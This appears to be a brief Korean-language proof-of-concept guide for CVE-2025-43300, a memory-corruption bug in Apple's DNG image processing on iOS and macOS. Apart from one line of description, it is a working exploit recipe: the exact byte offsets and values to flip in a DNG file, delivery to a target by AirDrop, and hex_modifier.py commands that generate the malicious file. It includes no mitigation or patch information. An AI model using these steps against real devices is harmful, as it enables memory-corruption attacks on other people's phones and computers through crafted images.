
CVE-2025-43300: iOS/macOS DNG 이미지 처리 메모리 손상
CVE-2025-43300: iOS/macOS DNG 이미지 처리 메모리 손상
Apple의 이미지 처리(RawCamera.bundle)의 취약점은 iOS 18.6.1 및 macOS에 영향을 미칩니다. 이 문제는 DNG 파일에 불일치하는 TIFF 메타데이터와 JPEG 무손실 매개변수가 포함될 때 발생하여 메모리 손상을 초래합니다.
DNG 해상도의 이미지를 다운로드하십시오.
다음 바이트를 수정하십시오:
0x2FD00: 01 -> 02
0x3E40B: 02 -> 01
Airdrop 등
# 알려진 취약 오프셋을 사용하여 POC 생성
python3 hex_modifier.py create-poc <input.dng>
# 수동 바이트 수정
python3 hex_modifier.py modify <input.dng> <offset> <old_byte> <new_byte> <output.dng>
# 차이 보고서 생성
python3 hex_modifier.py diff <original.dng> <modified.dng>